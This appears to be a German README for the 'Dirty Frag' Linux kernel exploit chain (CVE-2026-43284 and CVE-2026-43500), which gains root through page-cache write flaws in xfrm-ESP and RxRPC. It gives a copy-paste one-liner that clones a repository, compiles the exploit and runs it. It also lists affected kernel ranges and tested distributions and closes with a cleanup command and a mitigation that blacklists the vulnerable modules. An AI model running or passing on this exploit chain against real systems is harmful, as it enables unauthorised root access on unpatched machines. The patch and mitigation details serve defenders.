
Linux-Kernel-Exploit-Kette (CVE-2026-43284 und CVE-2026-43500), die über xfrm-ESP- und RxRPC-Page-Cache-Schreibschwachstellen Root-Rechte erlangt.
Linux CVE-2026-43284 & CVE-2026-43500
Kopiert von @V4bel :) Danke :)
Dieses Dokument beschreibt die Dirty-Frag-Schwachstellenklasse, die erstmals von Hyunwoo Kim (@v4bel) entdeckt und gemeldet wurde und mit der Root-Rechte auf wichtigen Linux-Distributionen erlangt werden können, indem die xfrm-ESP Page-Cache Write (CVE-2026-43284)-Schwachstelle mit der RxRPC Page-Cache Write (CVE-2026-43500)-Schwachstelle verkettet wird.
Dirty Frag ist ein Fall, der die Fehlerklasse erweitert, zu der Dirty Pipe und Copy Fail gehören. Da es sich um einen deterministischen Logikfehler handelt, der nicht von einem Zeitfenster abhängt, ist keine Race Condition erforderlich, der Kernel gerät bei einem fehlgeschlagenen Exploit nicht in Panik, und die Erfolgsrate ist sehr hoch.
Detaillierte technische Informationen und die Zeitleiste finden Sie hier.
xfrm-ESP Page-Cache Write (CVE-2026-43284) wurde im Mainline-Kernel mit f4c50a4034e6 gepatcht.
RxRPC Page-Cache Write (CVE-2026-43500) wurde im Mainline-Kernel mit aa54b1d27fe0 gepatcht.
Ausnutzung: Nur in autorisierten Einsätzen ausführen !!
Oneliner: git clone https://github.com/Minime794/DirtyFrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
Schritt für Schritt:
zuerst den Exploit kompilieren, dann die Binärdatei ausführen
gcc -O0 -Wall -o exp exp.c -lutil
./exp
!! Bereinigung
⚠️ Wichtig: Nach dem Ausführen dieses Exploits ist der Page-Cache kontaminiert. Um den verschmutzten Page-Cache zu leeren und die Systemstabilität zu gewährleisten, führen Sie entweder Folgendes aus:
echo 3 > /proc/sys/vm/drop_caches
oder starten Sie das System neu. Betroffene Versionen
CVE-2026-43284: Die xfrm-ESP Page-Cache Write-Schwachstelle ist im Bereich von cac2661c53f3 (2017-01-17) bis f4c50a4034e6 (2026-05-05) enthalten.
CVE-2026-43500: Die RxRPC Page-Cache Write-Schwachstelle ist im Bereich von 2dc334f1a63a (2023-06-08) bis aa54b1d27fe0 (2026-05-10) enthalten.
Mit anderen Worten, die effektive Lebensdauer der Schwachstellen beträgt etwa 9 Jahre.
Dieses Dirty Frag wurde auf den folgenden Distributionsversionen getestet.
Ubuntu 24.04.4: 6.17.0-23-generic
RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed: 7.0.2-1-default
CentOS Stream 10: 6.12.0-224.el10.x86_64
AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
Fedora 44: 6.19.14-300.fc44.x86_64
...
Mitigation
Verwenden Sie den folgenden Befehl, um die Module zu entfernen, in denen die Schwachstellen auftreten, und den Page-Cache zu leeren.
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
Sobald die einzelnen Distributionen einen Patch zurückportieren, aktualisieren Sie entsprechend.